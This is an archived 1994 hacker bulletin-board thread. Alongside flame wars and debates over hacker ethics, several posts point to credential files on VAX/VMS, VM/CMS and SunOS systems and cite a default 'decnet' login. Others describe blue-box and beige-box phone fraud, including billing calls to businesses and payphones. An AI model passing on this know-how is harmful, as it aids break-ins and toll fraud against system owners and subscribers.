the next part is easy. Once you have the file that is encoded, say you are using the mail program do this: mail < [uuencoded filename] This mails me the file. If you use pine, then you can just attach the file (without encodeing it), or at least I think you can. Anyway give it a try. If you screw it up, then we will give it another try. The world is not gonna end. Brinx thanks. From CB@yabbs Sun Feb 13 15:51:52 1994 From: CB@yabbs To: Jeremiah@yabbs Subject: re: Information Date: Sun Feb 13 15:51:52 1994 What sort of info are you looking for. I have apretty good collection of texts on assorted things from bombmaking to pheaking, hacking and some other shit to. Lemme know what you are into. Gimme an address, and I will do what I can to send you some stuff. Other wise aracgoni spoke good words, Good site. Try phrack, nas and others. If you are evern in a good bookstore look for hard copy of 2600. 4$/issue I think. pretty good stuff too. Lottsa luck brinx From Xela@yabbs Sun Feb 13 16:16:22 1994 From: Xela@yabbs To: CB@yabbs Subject: re: Information Date: Sun Feb 13 16:16:22 1994 no longer carries phrack due to the amount of traffic it receives. my earlier post carries an ftp address (umich, i think) which has phrack. more luck to ya -alex From Gnarr@yabbs Sun Feb 13 16:42:37 1994 From: Gnarr@yabbs To: Cosmos@yabbs Subject: re yeah okay Date: Sun Feb 13 16:42:37 1994 WELL Cosmos, EXCUSE THE FUCK OUT OF ME! From Madcap@yabbs Sun Feb 13 17:08:33 1994 From: Madcap@yabbs To: all@yabbs Subject: re: re yeah okay Date: Sun Feb 13 17:08:33 1994 try they usually have interesting shit including phrack Cosmos: looks like your the only one that remembers what hacking is really all about, not that i'm insulting anyone else here but it seems like all you hear about anymore is sys crashing. From binkley@yabbs Sun Feb 13 18:37:25 1994 From: binkley@yabbs To: all@yabbs Subject: Vax/VMS Date: Sun Feb 13 18:37:25 1994 OK, I have an account on a VAX running VMS/CMS yada yada yada... Well the other day I was playing around with some of the commands like LInk, and ACC and define ect.. and then I did a download to get some stuff from my minidisk... well, instead of saying kermit send *.zip I said *.* and I went to bed. I woke up the next morning to find about 10 Megs of VMS software, all the different file for it... So...... My question is... Does anybody know the name of the file which contains account, and password information?? Cosmos, you must know! From cosmos@yabbs Mon Feb 14 05:24:21 1994 From: cosmos@yabbs To: Gnarr@yabbs Subject: re: re yeah okay Date: Mon Feb 14 05:24:21 1994 You still do not get it do you? Come back after you have hit puberty. Cosmos From cosmos@yabbs Mon Feb 14 05:30:45 1994 From: cosmos@yabbs To: binkley@yabbs Subject: re: Vax/VMS Date: Mon Feb 14 05:30:45 1994 You confused me here...VMS/CMS???? A vax would run VMS yes, but maybe I am out of touch but I doubt it runs VMS/CMS...I doubt that OS even exists! Do you mean IBM's VM/CMS?? That is what I think you mean, especially with talk of minidisks and such. If so, forget it. That info is stored on a read only minidisk, you may be able to read it(I doubt it) but you will never be able to write anything to it. VM/CMS is worthless IMHO, I used it for a bit and hated every second of it. Really nothing to do with it unless you love mainframes. As for VMS, don't mess with that much but can find out for you. Tell me the exact version and exact OS. The only fun thing VM/CMS had(and I think it was fixed) was one annoying "security" feature where if you tried to login incorrectly as someone more than three times it shut their account down. There was pandemonium at our uni after the Computer Sci geeks got hold of that info...;) Cosmos From Nomad@yabbs Mon Feb 14 09:22:31 1994 From: Nomad@yabbs To: all@yabbs Subject: f1L3z Date: Mon Feb 14 09:22:31 1994 I must say that I so terribly tired of seeing all these newbies asking where that can get hacking files. I have read *countless* files and I have learned very little from them. If you guys really want to learn how to hack then you should first familarize yourself with the type(s) of systems you wish to hack? If you want to hack a certain system type (i.e. unix) then you should follow the following procedures: a) Get some information. (libraries, bookstores, etc) b) Get access. Everyone here appears to have access to the Internet. How are you getting it? School? Pay account? Hacking? c) Find someone knowledgeable. I know many unix users who have *never* hacked but yet they know enough to do it quite successfully. So you do not need to know other hackers to learn how to hack. I learned from very little. I think I figured the shit out ok. d) Do not call too many bbs systems. This will get you into a habit of learning little trivial shit. e) Study the references you have. After you learn how the system works then get in contact with others. Find someone local. Shit I dunno. If anyone here actually sent me mail about a problem they had doing something or trying to figure out something I would help. If I got mail from some dweeb asking if I new any bugs for IRIX I wouldn't waste my time replying.. Do not sit back and expect the people who know the shit to just say 'here' and just give you everything you need to know. I worked my ass off to learn what I know and I am not about to give somebody help if they just want to go netsurfing to see how many systems they can crack in a week. The shit just does not work that way and it appears to me that alot of ppl think that it does. Crack a book. Read it. If you do not understand something then ask. I'm sure you will get bagged on or ignored asking about the newest NFS bug. I'd rip anyone who bagged on you for asking a question about something as simple as the format of utmp because that involves thinking, C programming, etc. Well my little lecture has come to an end. I could go on and on about hacking pursuits just like my dad does about the army. But would you listen? I doubt it. Nomad From panzer@yabbs Mon Feb 14 11:34:36 1994 From: panzer@yabbs To: all@yabbs Subject: re: Hacking... Date: Mon Feb 14 11:34:36 1994 Hacking is: Kicking a little bean bag around with your feet... Breaking into systems and crashing/trashing them... Cutting things apart with large blades... Doing ANYTHING in a way that is non-standard, but gets the job done. Coughing your guts out and spewing vomit on people... Breaking into systems and gaining knowledge and access... Hacking is many things to many people. It is also something that everyone has a different opinion about. Get a clue, and don't run endless conversations about "what hacking is". This is about as pointless as asking everyone what Cyberpunk is? If people ask questions, maybe someone will answer them. Maybe they won't. Personally, it's more fun for me to run a complete unix system with 24 hour net access from my house. I am not associated with any university. I have learned many things in setting this sustem up, and in turn this is helping me find jobs that pay more than any type of hacking I can do. And both options gain me network knowledge that I enjoy. -Panzer From Fastjack@yabbs Mon Feb 14 12:45:15 1994 From: Fastjack@yabbs To: all@yabbs Subject: Background info Date: Mon Feb 14 12:45:15 1994 Helo... Just wanted to know if anyone has any info on the 'wiz' backdoor. YES, I know that if it ever existed, it DOES NOT anymore. I just wanted a little bit of background and history, and it's tough finding a good reference to an obsolete backdoor. Just that innate sense of curiousity that causes some of us to figure this shit out.... fastjack From cosmos@yabbs Mon Feb 14 13:19:26 1994 From: cosmos@yabbs To: Nomad@yabbs Subject: re: f1L3z Date: Mon Feb 14 13:19:26 1994 I hear you. Cosmos From Gnarr@yabbs Mon Feb 14 16:34:17 1994 From: Gnarr@yabbs To: all@yabbs Subject: okay.. Date: Mon Feb 14 16:34:17 1994 To nomad. At least I can thank you for being nice about it and not being so blunt and shitty like cosmos. your long lecture(athough boring) was informative. Thanks p.s. I can understand why you feel teh way you do. To COSMOS. Just who do you think you are? I didn't want to learn to hack just to go crash places and fuck tehm up. you didn't have to be such a fuckhead and arrogant about your response. Go rot in hell you little shit. From feotus@yabbs Mon Feb 14 17:21:30 1994 From: feotus@yabbs To: Gnarr@yabbs Subject: re: okay.. Date: Mon Feb 14 17:21:30 1994 Im not really into flaming or nothing, but Gnarr, go buy a clue, take two there small. as if anyone would give you information to crash a muse. That's someone elses work, there art piece, ther programming, there child etc... dont mess with that shit cause of a few things also 1. If you dont know anyting now there is no way in hell that youl be able to crack a system o crash it wuthout getting caught, no matter what they tell ya. 2. you dont sound like someoneith the mentality to learn this stuff since you are way to quick to go ballistic and hit the roof over petty things. oh well, my version of hacking, well screw it why should I waste bandwidth trying to tell it to ya. From cosmos@yabbs Mon Feb 14 18:54:36 1994 From: cosmos@yabbs To: Gnarr@yabbs Subject: re: okay.. Date: Mon Feb 14 18:54:36 1994 You are pathetic, period. As for my arrogance, it is earned kiddie. This is #hack not #crash, your stupidity and lameness have no business here. Go back to your AMIGA and jerk off dicksmack. Cosmos From binkley@yabbs Tue Feb 15 00:45:03 1994 From: binkley@yabbs To: cosmos@yabbs Subject: re: Vax/VMS Date: Tue Feb 15 00:45:03 1994 I tried loggin in myself twice, it would let me.. I believe you are right VM/CMS BUt what is the file name?? It sure is a non-user friendly shit ass os, but I'm gettin' the hang of it pretty good.. OQ binkley From cosmos@yabbs Tue Feb 15 05:23:27 1994 From: cosmos@yabbs To: binkley@yabbs Subject: re: Vax/VMS Date: Tue Feb 15 05:23:27 1994 I still dont know what you want to do with VM/CMS, here is a good clue, do you hasve to use PFKEYS like PF1 and so on for tasks...then it is definately VM/CMS. ANyways, the password stuff should be under dirmaint. Cosmos From Pakratt@yabbs Tue Feb 15 11:18:34 1994 From: Pakratt@yabbs To: Fastjack@yabbs Subject: Re: Toneloc Date: Tue Feb 15 11:18:34 1994 >>>>>[ Could you possibly tell me where to look for Tonloc on the net or maybe give me something to look for using Archie? Thanx, Pakratt ]<<<<< From CB@yabbs Tue Feb 15 21:19:19 1994 From: CB@yabbs To: Xela@yabbs Subject: Phrack Date: Tue Feb 15 21:19:19 1994 Shit, I knew that. I don't know what I was thinking when I posted that. If I am not mistaken there is a list of other sites that carry it there. Also wuarchive carries much shit. I don't know the proper address for it. Anyone know? Brinx (feelin just a little small than usual today) From CB@yabbs Tue Feb 15 21:33:06 1994 From: CB@yabbs To: CB@yabbs Subject: Flame Date: Tue Feb 15 21:33:06 1994 I think that an anti flame device would be useful in these parts. Brinx From binkley@yabbs Wed Feb 16 01:23:50 1994 From: binkley@yabbs To: cosmos@yabbs Subject: re: Vax/VMS Date: Wed Feb 16 01:23:50 1994 Yep, PFKEYS yada yada yada... Dirmaint.??? dirmaint.*?! From ytrew@yabbs Wed Feb 16 03:22:58 1994 From: ytrew@yabbs To: all@yabbs Subject: Binghampton Date: Wed Feb 16 03:22:58 1994 Hmmmmm does anyone know about the C2 sec. running there? Whats up w/ that..... hmm BUT they are running it on Suns.. tell me what ya think? One more thing.. if your from Penn.. near Pitt I'm curious about how HS in the area access then net... I need to contact one of my friends who lives there and knows that some area Hs have access to the net.. Thank Phreaks =) From cosmos@yabbs Wed Feb 16 05:25:41 1994 From: cosmos@yabbs To: binkley@yabbs Subject: re: Vax/VMS Date: Wed Feb 16 05:25:41 1994 Heh, VM/CMS alright. Get off it while you can. Passwords are plaintext unless IBM got smart recently. Still, if you poke enough you can mount many system minidisks from your little account. Why you would want to do this is beyond me though! Dirmaint is where you will find them if it is still the same. Been over a year since I have touched a VM system. Cosmos From JasonLee@yabbs Wed Feb 16 15:21:05 1994 From: JasonLee@yabbs To: arachnoi@yabbs Subject: re: wuarchive Date: Wed Feb 16 15:21:05 1994 What are you talking about? JasonLee From Pakratt@yabbs Wed Feb 16 15:25:22 1994 From: Pakratt@yabbs To: arachnoi@yabbs Subject: re: Re: Toneloc Date: Wed Feb 16 15:25:22 1994 Thanx arachnoi. |8-] From skippy@yabbs Wed Feb 16 15:40:31 1994 From: skippy@yabbs To: cosmos@yabbs Subject: re: Vax/VMS Date: Wed Feb 16 15:40:31 1994 nope.... that bug... where the account freezes if you incorrectly login 3 tiimes is still there... i work at IBM and have had that happen to me a few times... me trying to type too fast ya know... :) it might be that our system people just set it up that way... i dunno... --skip From tknight@yabbs Wed Feb 16 18:06:15 1994 From: tknight@yabbs To: all@yabbs Subject: cut the shit. Date: Wed Feb 16 18:06:15 1994 Ok,I'm with Nomad and Cosmos on this issue,you're probably not going to learn shit from some file you ftp. Believe it or not I learned some of my best information straaight from the damn manuals(for instance call your local dec dealer,they'll send you just about anything you ask them for). But hacking is not for revenge,it is for the exploration of digital frontiers(oh shit,i'm starting to sound like an issue of wired)and not for system crashing. Do realize if I wiped out every hard drive i had accesses to in my area i would just be fucking my self over(besides the poor guy y that cant find his thesis pape in his home directory). For example i've had access to a local AIX system in my area for about 3 months,I have super user and all and could wipe them out if i was a stupid lamer,but instead i do what hackers originally starting out did. I LEAR. Thats right i pull out my unix manuals and teach my self to program in shell,c and lisp. Why? you ask. If you have to ask you dont understand the hacker ethic,and no matter how many textfiles you read and how elite you think you are, you will never understand why either. OK,that was my little rant,OOps,I meant I LEARN ^ there. If you didnt like this thats your opinion,you can rebut me but flaming me will just make your self look stupid. Arguments are valid,flames are not. Alright VM/CMS is probably the worst OS i have seen in a while. I like the minidisks idea but i think Alpha Micro did a better job with AMOS. I'll dig up which minidisk exactly its stored in but you usually cant access it , in a past phrackthere was an article with evry IBM factory default for VM/CMS machines. All the article does is give you logons,so even if you do get in you wont know shit(unless,you RTFM) Ok,I am no where near god like hacker status but i have been experimenting with system 75 lately( i mean i've set up pbxs and the sort) but i would be very intrested in talking about setting up a bridge with syetm 75 with some one. Tobias Knight Cant wait to see the byte size on this one. From binkley@yabbs Wed Feb 16 23:40:34 1994 From: binkley@yabbs To: cosmos@yabbs Subject: re: Vax/VMS Date: Wed Feb 16 23:40:34 1994 Ahh yes... I want the Exact filename for the password/account file Anybody else know?!?!?! From uufnord@yabbs Thu Feb 17 03:43:52 1994 From: uufnord@yabbs To: all@yabbs Subject: hackin girlies Date: Thu Feb 17 03:43:52 1994 There's this chic I know and she's runnin' BABE 2.0 for Windows, and I REALLY wanna start messin' with he interface devices, ya know? But, I think I need a shell script to get root, man, I need to get root, I'm gonna have a spasm if I don't, need root, root root. Ohhhh.. that feels much better now. From Thorwak@yabbs Thu Feb 17 17:00:46 1994 From: Thorwak@yabbs To: all@yabbs Subject: finger script Date: Thu Feb 17 17:00:46 1994 I made this script that contained about 100 lines in the format finger >> and ran it in the background. Then I DL'd the file, only to discover that several login names occured at 5-6 times in the output file. I'm 100% sure that there was no user with more than one "finger entry" in the script, so I really don't understand why this happened... Anyone got any ideas? (If this post is confusing it's cause I'm swedish, and don't knoe english 100%...) Thorwak From sevmek@yabbs Thu Feb 17 18:36:54 1994 From: sevmek@yabbs To: arachnoi@yabbs Subject: re: wuarchive Date: Thu Feb 17 18:36:54 1994 wuarchive had a Very Bad disk crash recently due to an operating system bug, that got all their data and most of their backups. They're restoring from mirror sights and new uploads, but for now wuarchive isn't what it used to be, and is overloaded with the reloading process. From Fastjack@yabbs Thu Feb 17 18:41:34 1994 From: Fastjack@yabbs To: ytrew@yabbs Subject: re: Binghampton Date: Thu Feb 17 18:41:34 1994 Yo... Before ya start askin questions about the security, ya gotta figure out whether there runnin SunOS 4.1.3 [BSD based] or 5.x [AT&T SVR4 based]. Under 4.1.3, passwds are in which you can't read. No one is allowed to log in as root, only su to it. Auditing is enabled; options vary. That's basically 5.x, passwds are in /etc/shadow like Sys V. There are a hell of a lot of PD things they could be running which would make it a lot tougher, like tcpwrappers, logging daemons, modified sendmail, ... I'm not familiar with that site; telnet there or try the SMTP port to figure the OS rev. number... FJ From Crusader@yabbs Thu Feb 17 22:16:32 1994 From: Crusader@yabbs To: all@yabbs Subject: C Date: Thu Feb 17 22:16:32 1994 I'm curious, & this seems like as good a place as any. Where can I get a Txt on programming in C, I have a Macintosh & a free compiler so why not Thanx, I really aprecciate this (If anyone responds) I would prefer one with mac specific examples if it's at all possible. Oh yeah, as if you all care, Go Cosmos! Please don't allow people just looking for cheap knowledge on how to make phree calls get away with deystroying an artform. Crusader From binkley@yabbs Fri Feb 18 00:53:33 1994 From: binkley@yabbs To: Crusader@yabbs Subject: all Date: Fri Feb 18 00:53:33 1994 BBS Anybody know where I moight pick up a copy of a good BBS program?? I'd really like to get LSD, or celerity, or even aftershok. Anybody help[ me? From cosmos@yabbs Fri Feb 18 05:51:55 1994 From: cosmos@yabbs To: uufnord@yabbs Subject: re: hackin girlies Date: Fri Feb 18 05:51:55 1994 Where do these fucking retards come from?? Cosmos From ducky@yabbs Fri Feb 18 11:08:40 1994 From: ducky@yabbs To: Thorwak@yabbs Subject: re: finger script Date: Fri Feb 18 11:08:40 1994 In message finger script, Thorwak said: > I made this script that contained about 100 lines in the format > finger >> > and ran it in the background. Then I DL'd the file, only to discover > that several login names occured at 5-6 times in the output file. > I'm 100% sure that there was no user with more than one "finger entry" in > the script, so I really don't understand why this happened... Anyone got > any ideas? Some versions of finger return a full listing for a person for every tty that they are logged in on. So, if a person was logged in a bunch of times (say using screen or X), you'd get the full spew about them for each tty. This is kinda braindead, and most modern fingers just list a single line for each tty a person is on in a single entry for them. -k From Palisade@yabbs Fri Feb 18 11:40:10 1994 From: Palisade@yabbs To: all@yabbs Subject: newbie Date: Fri Feb 18 11:40:10 1994 Uhh...I'm kinda new here. I am just learning how to hack and I don't szeem to be able to find very much information. Does anyone know where I could find any? From McArthy@yabbs Fri Feb 18 14:53:24 1994 From: McArthy@yabbs To: binkley@yabbs Subject: re: all Date: Fri Feb 18 14:53:24 1994 Aftershock... Hm, that's a bbs soft that I haven't heard about in a long time. It was fairly popular in 602 for a while, (until all the sysops started warring with each other). I cant point you to anywhere on the net to get it, and most of the 602 boards stopped supporting it, but if I see it lying around local somewhere I'll put it on ftp somewhere. From McArthy@yabbs Fri Feb 18 14:58:55 1994 From: McArthy@yabbs To: Palisade@yabbs Subject: re: newbie Date: Fri Feb 18 14:58:55 1994 The best way to find information is to read, do, and be patient. There's no secret textfile of hacker knowlege... This isnt some sort of RPG... Basically go through the messages and look at the questions... Think about the questions... Think about why anyone would want to do what they are asking about...(message 806 for example ) [B[B Explore everything and take notes.... Familiarize yourself with the net, and love doing it. Don't be demanding tangible results everyday. After doing this for a while, one day youll stop to think, and realize you've achieved what you've wanted. From NJDEVIL@yabbs Fri Feb 18 18:06:48 1994 From: NJDEVIL@yabbs To: arachnoi@yabbs Subject: re: Trojan horse Date: Fri Feb 18 18:06:48 1994 Thanx NJD From NJDEVIL@yabbs Fri Feb 18 18:15:33 1994 From: NJDEVIL@yabbs To: arachnoi@yabbs Subject: re: wuarchive Date: Fri Feb 18 18:15:33 1994 I agree, am non-hack, but get tons of good stuff there. From Fastjack@yabbs Fri Feb 18 18:33:55 1994 From: Fastjack@yabbs To: ytrew@yabbs Subject: re: Binghampton Date: Fri Feb 18 18:33:55 1994 Just noticed that part of that last message was missing... should be /etc/security/passwd.adjunct. The editor cutt out because it started with a slash.... From Thorwak@yabbs Fri Feb 18 21:15:21 1994 From: Thorwak@yabbs To: ducky@yabbs Subject: re: finger script Date: Fri Feb 18 21:15:21 1994 I see.. This was not the case here, tho... First of all, none of them where logged on, and second, there were others users BETWEEN thos entries that repeated themselves... Real strange Thorwak From statix@yabbs Sat Feb 19 10:33:31 1994 From: statix@yabbs To: Thorwak@yabbs Subject: re: finger script Date: Sat Feb 19 10:33:31 1994 Thorwak: a lot depends on how your version of finger parses the names when it does comparisons against passwd entries, such as if you said: finger fred3027 finger dan It would turn up fred3027 (a username match) and possibly all people who's first or last names began with fred, and then fingering on dan would turn up a hit on a username of dan, or any first or last names beginning with dan, so with these two finger you could possibly get results such as: username: fred3027 In real life: Dan Frederick username: hath2876 In real life: Fred Hathenberg **** results from finger fred3027 *** username: fred3027 In real life: Dan Frederick username: dan In real life: Theo Dan username: litg4567 In real life: Danielle Litgo If you want to just check on a specific username, most fingers support a -m option to force username only matches, you may want to give that a try. -statix From Thorwak@yabbs Sat Feb 19 12:03:32 1994 From: Thorwak@yabbs To: statix@yabbs Subject: re: finger script Date: Sat Feb 19 12:03:32 1994 Ok, I guess it was something like this that happened... I will try the -m option and get back to you (if you're interested...) Thanx for your help! Thorwak From amadeus@yabbs Sat Feb 19 12:21:05 1994 From: amadeus@yabbs To: Phain@yabbs Subject: re: Pirate Radio? Date: Sat Feb 19 12:21:05 1994 > On de FCC laws, is it either 5 mile radius, or 3 hours ? Could I > broadcast for 8 hours with a one mile radius and the fedz not care? don't do 8 hours man.....they'll shit. go for about 2 or 3 a week....that would keep you out of trouble From Justin@yabbs Sat Feb 19 15:45:49 1994 From: Justin@yabbs To: all@yabbs Subject: boxes Date: Sat Feb 19 15:45:49 1994 Ok..Here's my question... I've been diligently reading books on UNIX, and following the messages on this conference. I'm begining to learn the basis to unix, and how the internet operates. However, there is still one facet that I'm having trouble understanding. The "boxes." I've read about the redboxes, but I have a much greater interest than just finding quarter-tones. I've heard of a bluebox and beigebox, but haven'y been able to find any information on them. Would someone either be willing to shed a little light on this for me, or at least tell me where it is that I should start looking? Any help would be greatly appericiated. -Justin From cosmos@yabbs Sat Feb 19 17:18:50 1994 From: cosmos@yabbs To: Justin@yabbs Subject: re: boxes Date: Sat Feb 19 17:18:50 1994 All I have to say is that I wouldnt suggest trying to bluebox theses days. Cosmos From Schief@yabbs Sat Feb 19 19:10:02 1994 From: Schief@yabbs To: McArthy@yabbs Subject: re: all Date: Sat Feb 19 19:10:02 1994 Ah...602 land....I remember the days of all the 3lyt3 d00ds who were a local call away, running their WaReZ b0ardzz on Aftershock.... From Fastjack@yabbs Sat Feb 19 22:51:33 1994 From: Fastjack@yabbs To: Justin@yabbs Subject: re: boxes Date: Sat Feb 19 22:51:33 1994 Read alt.2600. Anything you don't understand you can get from philes.... FJ From Angstrom@yabbs Sun Feb 20 20:59:15 1994 From: Angstrom@yabbs To: Justin@yabbs Subject: re: boxes Date: Sun Feb 20 20:59:15 1994 ...Basically the Blue Box emits a 2600hz tone (hence the zine 2600) causing the line to go dead and giving you the power of an operator, though nowadays telco monitors for that tone. There have been suggestions of mixing pink noise with the original signal 3000, but it does not work. The only way you can use a blue box today is use it where a line man has just installed a new line or tested one cause that tone is still used for testing...and that number can use a 2600 signal for about a month before it is taken off the telco list. Beige boing is using someone elses line through canning...and there is not musch risk as long as you only use that line once or twice and the only person who gets screwed is "Ma Bell" as the guy whose line you were using only has to pay $50 of the bill you rang up...well hope this helps... From oderous@yabbs Sun Feb 20 21:14:26 1994 From: oderous@yabbs To: cosmos@yabbs Subject: re: non-memory redbox Date: Sun Feb 20 21:14:26 1994 i don't see why not - the redial dials at the same rate as a priority. of course, i don't know if the rat shack models have re-dial buttons, but i know it works on my ripped up phone. From cosmos@yabbs Mon Feb 21 06:17:16 1994 From: cosmos@yabbs To: Angstrom@yabbs Subject: re: boxes Date: Mon Feb 21 06:17:16 1994 Good short info. Anyways, I have to disagree with the "only MA bell gets screwed" stuff. Sure, you run up a thousand dollar bill on a teleconference and the poor chap has to pay 50 bucks. Shit, 50 bucks is 50 bucks. I would be PISSED if I got the short end of the shaft for some geek high school punk who set up a telecon on my line. Anyways, if you are gonna do it. Do it to a business line. How about a local LD competitors lines? heheheheh Cosmos From feotus@yabbs Mon Feb 21 08:33:58 1994 From: feotus@yabbs To: cosmos@yabbs Subject: re: boxes Date: Mon Feb 21 08:33:58 1994 hehee, try it from your favorite neighborhood business, like the little processing plant down the road from me. OR, my favorite is to do it off of some older COCOTs. I set one up that way with a policeman no more than about fifty feet away harrasingthese kids. hehe, they were parked wrong, and I was preparing to scam a major large bill off the telco 8). Teleconferences are fun, but it always degenerates to a piss contest it seems. From cosmos@yabbs Mon Feb 21 11:23:29 1994 From: cosmos@yabbs To: feotus@yabbs Subject: re: boxes Date: Mon Feb 21 11:23:29 1994 Heh, the last Telecon I was on was when Maniac and Trexor got busted for tearing down a payphone. Sheesh. ANyways, you are right they always end up lame. Cosmos From Cat@yabbs Mon Feb 21 13:55:12 1994 From: Cat@yabbs To: cosmos@yabbs Subject: You were right Date: Mon Feb 21 13:55:12 1994 Wellup, I was bored, no one was on yabbs worth chatting with, so I thout I pop in here and read tjhis stuff Cos. And you were right! :) Quite imfamous aren't you? Hmmmmm I wonder.... From cosmos@yabbs Mon Feb 21 14:44:41 1994 From: cosmos@yabbs To: Cat@yabbs Subject: re: You were right Date: Mon Feb 21 14:44:41 1994 Yes! Go Tam! Heheheh, bet you had a blast reading the comp stuff! Normally I'd flame someone till hell froze over for posting off topic messages but Ill cut you some slack this time... Cosmos From DrClaw@yabbs Tue Feb 22 02:03:25 1994 From: DrClaw@yabbs To: all@yabbs Subject: vax/vms password file Date: Tue Feb 22 02:03:25 1994 for the one asking..the vax/vms password files exact names is sys$uaf.dat usually found at sys$exe:[000000] hasta From GreyWolf@yabbs Tue Feb 22 21:07:18 1994 From: GreyWolf@yabbs To: all@yabbs Subject: Port No.s Date: Tue Feb 22 21:07:18 1994 Greetings from the North Side. Ok, scenerio.. person of whom had learned alot of stuff on his old dos clone. Person goes to College, gets net access, and realizes there is alot more out there than just being stuck calling local BBS's on a 2400 bd modem. My question.. STD port numbers, what are some of them? The only one that I know for sure is the mail port 25, and the handshake.. but I would also like to know.. what is some of the handshakes for the others? Thank you kindly for your time and effort: GreyWolf From htoaster@yabbs Tue Feb 22 23:03:41 1994 From: htoaster@yabbs To: GreyWolf@yabbs Subject: re: Port No.s Date: Tue Feb 22 23:03:41 1994 look in /etc/services on any unix machine. it will have most of the ports for that machine (anything started by inetd)... you can connect to any of the ones marked as tcp ports with telnet... alex From binkley@yabbs Tue Feb 22 23:32:50 1994 From: binkley@yabbs To: DrClaw@yabbs Subject: re: vax/vms password file Date: Tue Feb 22 23:32:50 1994 in reply to a message from Dr.Claw >For the one asking..the vax.vms password files exact names >is >sys$uaf.dat usually found at sys$exe:[000000] hasta Thank you Dr. Claw. How come no answer from you Cosmos... finally find something you could't tell everybody to showboat yourself?!?! From cosmos@yabbs Wed Feb 23 09:09:52 1994 From: cosmos@yabbs To: binkley@yabbs Subject: re: vax/vms password file Date: Wed Feb 23 09:09:52 1994 *YAWN* Cosmos From Dauber@yabbs Thu Feb 24 14:11:03 1994 From: Dauber@yabbs To: Justin@yabbs Subject: re: boxes Date: Thu Feb 24 14:11:03 1994 Well, Justin, the bluebox is the phreaker's best friend, but unfortunately, they are so easily and quickly detected... It all started back in the '50's when a blind 8-year-old was screwing around with 800 numbers on the phone, listening to the recordings. Well, one day, he was habitually whistling while on the phone, and when one of the recordings was playing, one of the tones he whistled shut off the recording, so he tried experiementing with different tones, and eventually people adapted his idea and invented the bluebox, which produces special tones, blah blah blah. Read more about it in the book _Outside The Inner Circle_.. From uufnord@yabbs Fri Feb 25 02:48:59 1994 From: uufnord@yabbs To: al@yabbs Subject: chugga chugga Date: Fri Feb 25 02:48:59 1994 Chugga chugga chugga. Chugga jitter chugga chugga. Jitter chugga chugga jitter chugga, chugga chugga jitter jitter. Chugga jitter jitter jitter chugga chugga, chugga jitter chugga. Chugga chugga chugga jitter chugga, jitter chugga chuuga jitter. Jitter chugga chugga jitter jitter jitter chugga. Chugga jitter jitter, chugga chugga jitter. Jitter! Chugga chugga jitter chugga jitter chugga. Jitter chugga jitter chugga chugga jitter jitter. Chugga chugga chugga chugga chugga chugga chugga. Chugga Jitter From cosmos@yabbs Fri Feb 25 05:22:38 1994 From: cosmos@yabbs To: uufnord@yabbs Subject: re: chugga chugga Date: Fri Feb 25 05:22:38 1994 Chalk another lamer up in yabbs. Cosmos From GodEater@yabbs Sun Feb 27 17:30:42 1994 From: GodEater@yabbs To: cosmos@yabbs Subject: Blue Boxing Date: Sun Feb 27 17:30:42 1994 Actually, it is still possible to blue box a number of different ways. One method is to get an 800 country code number, and box off of that. Another is to do it in an area such that you don't go through a ESS station, though this requires more knowledge about the phone system than I have. As a disclaimer, I have done neither of these, but I know people who have, and still do. God Eater From Dauber@yabbs Mon Feb 28 13:58:57 1994 From: Dauber@yabbs To: DrClaw@yabbs Subject: re: vax/vms password file Date: Mon Feb 28 13:58:57 1994 I wish it was that easy! ON our VMS system, the passwords are encrypted, so if you lose/forget your password, they have to totally destroy your original one because they can't find it! You wanna see how VMS has no security? Just go to any VAX system and log in as "decnet". The default password is "Decnet" and chances are your system administrator didn't change it! I stumbled upon this in our school's VAX....and got caught! Needless to say, they changed the password--and FAST! From Dauber@yabbs Mon Feb 28 14:01:22 1994 From: Dauber@yabbs To: GodEater@yabbs Subject: re: Blue Boxing Date: Mon Feb 28 14:01:22 1994 I'm told that supposedlly a famous 800 number shuts down late at night and gives you a pseudo-blue may be 1-800-FLOWERS [Amlings] dial the number and supposedly get a second dial tone, and then dial whereever you want...I've tried this, and it's a lot of BS... From hawkwind@yabbs Mon Feb 28 14:51:27 1994 From: hawkwind@yabbs To: GodEater@yabbs Subject: re: Blue Boxing Date: Mon Feb 28 14:51:27 1994 can get an 800 country code and box off that ...its a bit more complicated than the ole 2600HZ of yester year...there are different freq's for different countries and the timing has to be more exact. My question is this: If you're going through an initial 5ESS exchange surely it will detect you? -ie most of us are on 5ESS or equivently smart exchanges these days even over here in Europe... ;-( I was reading a technical manual from Northern Telecom on Bluebox detection on their DMS 100/200 exchange (I think thats right?) and it was well scary...once it detected you...the software you were using had the ability to disconnect the call, or bill you for the call placed using the new MF tones (the blue box tones..) [sorry, thats meant to bwe the software they were using (northern Telecom)] Any comments? Cosmos maybe? L8rs, Hawkwind. From cosmos@yabbs Mon Feb 28 15:32:44 1994 From: cosmos@yabbs To: hawkwind@yabbs Subject: re: Blue Boxing Date: Mon Feb 28 15:32:44 1994 Yep. You got it Hawk. The newer software can disconnect, trace, bill, whatever to the idiot that is gonna bluebox. Sorry guys, I am not a phreak person and I really dont get into the inner workings of Ma Bell. Basically, less your super fucking good dont bother. Or go ahead and you face Ma bell and her lawyers. Cosmos From sirius@yabbs Mon Feb 28 17:37:05 1994 From: sirius@yabbs To: all@yabbs Subject: multiplexor Date: Mon Feb 28 17:37:05 1994 I found this strange sysytem a few days ago and I have no idea what it means. WHen I log on it says something like AT&T DCC-2000 Multiplexor. then doesn't prompt for an id or anything, just gives me a list of options , soe being to change the alarms, and misc numbers which have no meaning to me... -siruius From mips@yabbs Tue Mar 1 03:16:15 1994 From: mips@yabbs To: hawkwind@yabbs Subject: re: Blue Boxing Date: Tue Mar 1 03:16:15 1994 Boxing International 800 numbers: Forget all the different frequencies for different countries. U should use 2400/2600 to release the connection followed by a short pauseand then seize a trunk using 2400. Keep in mind that timing is critical here ! Cherio mips From SamIam@yabbs Tue Mar 1 12:02:03 1994 From: SamIam@yabbs To: hawkwind@yabbs Subject: re: Blue Boxing Date: Tue Mar 1 12:02:03 1994 Just don't try Sweeden, they have NASTY hardware on their AXes! Anyway, good luck. From CB@yabbs Tue Mar 1 16:24:13 1994 From: CB@yabbs To: all@yabbs Subject: Clipper info Date: Tue Mar 1 16:24:13 1994 I seek some info on clipper. I have read some of the recent writeups in CPSR and RISKS, even one in some net based telecom forum. I wish to see some files or something that I can read to get a more firm grasp on what exatly is going on. Is there anyone who can lead me to an ftp site where I can get what this? Brinx From micke@yabbs Wed Mar 2 08:03:07 1994 From: micke@yabbs To: SamIam@yabbs Subject: AXE ,,, Date: Wed Mar 2 08:03:07 1994 WOW first time ever i've heard sweden mentioned in this (and other bbs'es) ... i guess it's part 